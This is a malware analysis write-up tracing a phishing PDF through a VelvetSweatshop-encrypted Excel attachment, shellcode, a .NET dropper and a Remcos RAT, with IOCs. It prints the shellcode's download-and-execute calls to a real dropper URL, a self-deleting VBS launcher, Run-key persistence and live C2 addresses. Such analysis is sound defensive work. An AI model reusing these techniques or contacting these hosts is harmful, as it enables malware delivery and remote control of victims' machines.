# Formbook and Remcos Backdoor RAT

**connectwise.com/resources/formbook-remcos-rat**

August 4, 2022 by Stu Gonzalez

Tools

0x01 Document Analysis (19Jun22 ARR Safari.pdf)

0x02 Analysis of Dropped File (vbc.exe)

0x03 Analysis of DLL (Periodicity.dll)

0x04 Dynamic Analysis

VBS script

Registry

iys.exe

0x05 Additional Findings

0x06 IOCs

0x07 Upload

0x08 References

## Tools

The following tools were used during this analysis:

pdf-parser.py

zlib-flate

msoffcrypto-tool

oletools

oledump.py

xorsearch

scdbg

DnSpy

## 0x01 Document Analysis (19Jun22 ARR Safari.pdf)

Whilst enjoying a refreshing orange Fanta this weekend. I figured I would check out the ole spam trap.

I received 8 emails containing the same file.

After downloading the .eml files, I checked to see if there was any difference between the attachments in the emails.
They were all showing the same hash for all emails received.


-----

Time to extract the pdf 19Jun22 ARR Safari.pdf from the email by copying the base64 string and decoding it into a new
pdf file.

Using _[pdf-parser.py (by Didier Stevens) to inspect the pdf and find interesting components of this suspicious document.](https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py)_
```
$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -a

Comment: 3

XREF: 0

Trailer: 0

StartXref: 1

Indirect object: 47

  27: 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 3, 6, 8, 10, 11, 25, 27, 28, 29, 38, 40, 42, 44, 46

 /Action 1: 7

 /Catalog 1: 2

 /EmbeddedFile 1: 37

 /Filespec 1: 26

 /Font 1: 30

 /ObjStm 1: 1

 /Outlines 1: 4

 /Page 1: 9

 /Pages 1: 5

 /XObject 10: 31, 32, 33, 34, 35, 36, 39, 41, 43, 45

 /XRef 1: 47

Search keywords:

 /JS 1: 7

 /JavaScript 1: 7

 /OpenAction 1: 2

 /AcroForm 1: 2

 /EmbeddedFile 1: 37

```
The /Javascript and /EmbeddedFile looked interesting and worth further investigation.

The /Javascript object did not contain anything of value, but the /EmbeddedFile, on the other hand, appeared to be a
decent chunk in size.
```
$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -o 37 -d safari.compressed

> obj 37 0

> Type: /EmbeddedFile

> Referencing:

> Contains stream

>

> <<

> /Filter /FlateDecode

> /Type /EmbeddedFile

> /Length 48959

> >>

```
Using pdf-parser.py, I was able to extract the embedded file from the PDF
```
$ file safari.compressed

> embedded_file: zlib compressed data

```
Come to find out that the file was compressed, so I used zlib -flate -uncompress to decompress
```
$ zlib-flate -uncompress < safari.compressed > safari.encrypted

```
[Checking the file again to discover the file was CDFV2 Encrypted .](https://en.wikipedia.org/wiki/Compound_File_Binary_Format)
```
$ file safari.raw

> safari_pdf_embedded_file.encrypted: CDFV2 Encrypted

```
After some searching to figure out what could the password possibly be, I solidified the notion that this was Formbook
[and thanks to this article I was able to confirm it was VelvetSweatshop. Additionally, the password was a default](https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/)
Microsoft password, VelvetSweatshop.


-----

_VelvetSweatshop is a default key stored in Microsoft Excel program code for decryption. It s a neat trick that attackers_
can leverage to encrypt malicious Excel files in order to evade static-analysis-based detection systems, while
eliminating the need for a potential victim to enter a password.

[In order to decrypt, I was able to use msoffcrypto-tool to decrypt the file.](https://github.com/nolze/msoffcrypto-tool)
```
$ msoffcrypto-tool safari.encrypted safari.decrypted -p VelvetSweatshop

```
Checking the decrypted file, the final format is an Excel document.
```
$ file safari.decrypted

> safari.decrypted: Microsoft Excel 2007+

```
As with most MS documents, it was curious to check for any macros.
```
$ olevba safari.decrypted

olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools

===============================================================================

FILE: safari.decrypted

Type: OpenXML

No VBA or XLM macros found.

```
_[Oletools yielded no interesting or actionable information.](https://github.com/decalage2/oletools)_

Next I chose, _[oledump.py (by Didier Stevens) and used it to check for ole objects.](https://blog.didierstevens.com/programs/oledump-py/)_
```
$ oledump.py safari.decrypted

A: xl/embeddings/oleObject1.bin

 A1: 20 '\x01Ole'

 A2: 1721 '\x01Ole10NAtivE'

```
An OLE object in the spreadsheet that doesn’t contain macro code, could possibly mean it’s shellcode. Since A2 stream
looks larger, let’s extract and see if xorsearch -W can help us find an entry point.

Let’s extract the code with oledump.py.
```
$ oledump.py -d -s A2 safari.decrypted > shellcode.data

```
[Now we want to search with xorsearch.](https://blog.didierstevens.com/programs/xorsearch/)
```
$ xorsearch -W shellcode.data

Found XOR 00 position 0000024D: GetEIP method 3 E99C000000

Found ROT 25 position 0000024D: GetEIP method 3 E99C000000

Found ROT 24 position 0000024D: GetEIP method 3 E99C000000

Found ROT 23 position 0000024D: GetEIP method 3 E99C000000

Found ROT 22 position 0000024D: GetEIP method 3 E99C000000

Found ROT 21 position 0000024D: GetEIP method 3 E99C000000

...

```
_xorsearch found a GetEIP method at 0x24D in the A2 stream we exported. We can use this offset with scdbg to_
emulate the shellcode execution.

Select our shellcode file (shellcode.data) and select the options listed below before launching.


-----

Output from running scdbg.


-----

```
4014c4 GetProcAddress(ExpandEnvironmentStringsW)

4014f7 ExpandEnvironmentStringsW(%PUBLIC%\vbc.exe, dst=12fbd8, sz=104)

40150c LoadLibraryW(UrlMon)

401527 GetProcAddress(URLDownloadToFileW)

40157f URLDownloadToFileW(http://185.239.243.122/421/vbc.exe, C:\Users\Public\vbc.exe)

401596 LoadLibraryW(shell32)

4015ac GetProcAddress(ShellExecuteW)

4015bb unhooked call to shell32.ShellExecuteW step=40468

```
In the shellcode, the adversary uses ExpandEnvironmentStringsW to find the Public folder in Windows. Next, they use
_URLDownloadToFileW to retrieve content from hxxp://185.239.243.122/421/vbc.exe and write it to_
_C:\Users\Public\vbc.exe. Finally, they use ShellExecuteExW to launch vbc.exe._

The endpoint was still live and delivering the payload. So I grabbed the executable to begin Identifying what vbc.exe
could be.

## 0x02 Analysis of Dropped File (vbc.exe)
```
$ file vbc.exe

vbc.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

```
As you can see vbc.exe, is compiled in .Net. I will open vbc.exe in DnSpy on my VM.


-----

After opening the the executable in DnSpy, I found that the functions were encoded and I could only assume there were
so other parts of the executable that were obfuscated. For easy of reading, I chose to run the De4dot against the the
executable to clean it up a bit.

Thats better!

Stepping in to execution, I ran across a byte array called, <<EMPTY_NAME>> .

The byte array, <<EMPTY_NAME>>, is then load with the contents from Documents._22.


-----

Then a MemoryStream variable called memoryStream and loads <<EMPTY_NAME>> byte array.

Next a GZipStream variable called, gzipStream, decompress the contents of memoryStream and stores it in itself.

Lastly, a second MemoryStream called, memoryStream2, copies and coverts the decompressed contents
of gzipStream into memoryStream2.

After copying the stream, I can see a PE magic number (0x4D5A) in the _buffer byte array.

What is this binary file?!

Let’s dump and save it for later to analyze.

Right click on the _buffer variable → Show in Memory Window → Memory 1.

I am then shown the Memory Window and my binary file is already highlighted and selected.

Right click → Save Selection → save as dump.exe

After saving the binary, I checked the meta data of the file and I can see it is a .Net DLL called Periodicity.dll.


-----

Ok now that I have that saved, I head back to check and see what comes next with my memoryStream2 buffer.

The variable memoryStream2 is then passed to function that simply calls for System.Reflection.Assembly and loads the
binary into memory.

The pointer to the handle of the binary loaded into memory now resides in the assembly_ variable.

Next time we see the assembly_ variable, the process is attempting to retrieve public types defined in the assembly that
are visible outside the assembly.

The returned data shows the Module, Name, and Namespace of the exported type.

Next, I found the function, MyPoint() set an array variable with 3 values, that will later be used as arguments for the DLL
that was loaded into memory.
```
"506C6174666F726D4E6F74537570706F72746564457863657074"

"4C37554D"

"PolicyLevel"

```
Stepping through, I came across the last function that calls the Activator.CreateInstance module and supplies the
parameters of the exported type variable (_type) and the array of parameters I mentioned.


-----

After running this last function, the execution of vbc.exe within DnSpy terminates and a new process begins running by
the name of iys.exe. This instance is running is running from %AppData%/Roaming directory.

## 0x03 Analysis of DLL (Periodicity.dll)

Executing .NET dll, Periodicity.dll, via [SharpDllLoader, with the parameters I found earlier in my analysis of vbc.exe.](https://github.com/hexfati/SharpDllLoader)
```
Executable: C:\Users\IEUser\Downloads\SharpDllLoader-master\SharpDllLoader\bin\Release\SharpDllLoader.exe

Arguments: -d "C:\Users\IEUser\Desktop\dump.dll" -c CPeriodCollection -m .ctor -a
"506C6174666F726D4E6F7453757070 6F72746564457863657074 4C37554D PolicyLevel"

Working Directory: <path to sharpdllloader>

Break At: Entry Point

```
This did not work as I thought it would. I am not sure how I am suppose to load this DLL to analyze it but I will read
more into the process and hopefully can analyze in the future.

## 0x04 Dynamic Analysis

Let’s execute the vbc.exe on my sandbox and have Process Hacker, ProcMon, and Wireshark running to capture all the
fun bits.

I set my ProcMon filter to watch for what I know so far, the process names vbc.exe and iys.exe.

Wireshark will just be listening all traffic on my network interface.

I let this run for several minutes to make sure I wasn’t missing any delayed executions or networks calls.


-----

I was able to find file drops to %AppData% directory, registry entries, and network activity.

### VBS script

VBS script is written to the Temp Folder. Then promptly executed vbc.exe using wscript.exe.
```
C:\Windows\System32\WScript.exe C:\Users\IEUser\AppData\Local\Temp\install.vbs

```
The VBS script appeared to have a self delete component.

I used the following Powershell to copy the VBS script before it was deleted.
```
while (!(Test-Path "C:\Users\IEUser\AppData\Local\Temp\install.vbs")) {}; Copy-Item
"C:\Users\IEUser\AppData\Local\Temp\install.vbs" "C:\Users\IEUser\Desktop\install.vbs"

```
Contents of the install.vbs
```
WScript.Sleep 1000

Set fso = CreateObject("Scripting.FileSystemObject")

CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\IEUser\AppData\Roaming\iys.exe""", 0

fso.DeleteFile(Wscript.ScriptFullName)

### Registry

```
Registry set HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475
contains binary data. The data look very similar to the unstructured DLL binary array that was loaded into
MemoryStream from earlier during our code analysis of vbc.exe.

Registry set HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr contains the path to
the C:\Users\IEUser\AppData\Roaming\iys.exe to execute upon every startup (Persistence).

Lastly, two entries under HKCU\Software\Remcos-KO7WBT that match known Remcos RAT registry entries structure.


-----

```
exepath: 9c d6 73 bf e5 0f be a9 5e 14 57 ab f4 aa 59 ec 19 64 9d 8b 9e 09 91 99 e5 e3 1e ee 0c db da cb 05 57
db
ea 8a 65 74 f8 0a 1e 28 9b 42 d8 22 fe 35 01 71 d1 e3 64 74 53 6a 11 af 27 66 18 d5 7a 7f 21 46 1c 14 5b c4 57
ac
e0 f5 8b da 83 4d af

licence: d75ea3de2ad117e4485816ef2a4a46f1

### iys.exe

```
New file written to %AppData%\Roaming\iys.exe.

_iys.exe hash matches vbc.exe._

_iys.exe uses C:\Users\IEUser\AppData\Roaming\logs.dat as way to log information. Likely related to its C2 activity._

_iys.exe was seen making network connections out to 62.197.136.86 over port 3091 and 178.237.33.50 over port 80._

## 0x05 Additional Findings

I found an interesting choice in icon images stored in the Resources of the executable. Reverse image search of the
icon turned out to be the National Emblem of Indonesia, Symbol Garuda Pancasila.

## 0x06 IOCs

Hash Filename

d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd 19Jun22 ARR Safari.pdf

5d17b63fe99f0608c79129a296bba3af7c8dcfe17913f93ce67dbda376f6987c safari_pdf_embedded_file.compressed

25672487eb5df23ce72e6ea101ef4047c1407cb0dcb25e59486f125763a9f69d safari_pdf_embedded_file.encrypted


-----

e1192a47786ea37fd75864d7b8b9a049b4ab72bad852b052318f863713bc97d7 safari_pdf_embedded_file.decrypted

dac51b15136081c2540d2c4c16372668e5e54c89d233e8b30faaabf7c901bc84 vbc.exe

490a432a796c670a8eb7b93ee1710eb023ab12fcebc7a7225c4d7b030330abb8 shellcode.data

IP

hxxp://185.239.243.122/421/vbc.exe Dropper

62.197.136.86:3091 C2

178.237.33.50:80 GeoIP Location

Files

C:\Users\Public\vbc.exe Dropped File Path

%AppData%\Local\Temp\install.vbs VBS script

%AppData%\Roaming\iys.exe C2 Log File

%AppData%\Roaming\iys.exe Persistence RAT Path

Registry

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr %AppData%\Roaming\iys.exe

HKCU\Software\Remcos-KO7WBT\exepath Data: 9C D6 73 BF E5 0F BE A9 5E 14 57
AB F4 AA 59 EC

HKCU\Software\Remcos-KO7WBT\licence Data:
D75EA3DE2AD117E4485816EF2A4A46F1


HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Notifications\Data\418A073AA3BC3475

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ZoneMap\ProxyBypass

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ZoneMap\IntranetName

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ZoneMap\UNCAsIntranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ZoneMap\AutoDetect


Binary data

1

1

1

0


-----

## 0x07 Upload

[https://www.filescan.io/uploads/62aecf127046ab63f87d6f0c/reports/40faed10-37d6-4273-8c8fb58fcfcd676a/overview](https://www.filescan.io/uploads/62aecf127046ab63f87d6f0c/reports/40faed10-37d6-4273-8c8fb58fcfcd676a/overview)

[https://bazaar.abuse.ch/sample/d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd/](https://bazaar.abuse.ch/sample/d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd/)

## 0x08 References

[https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/](https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/)

[https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/backdoor.win32.remcos.usmaneaggk/](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/backdoor.win32.remcos.usmaneaggk/)


-----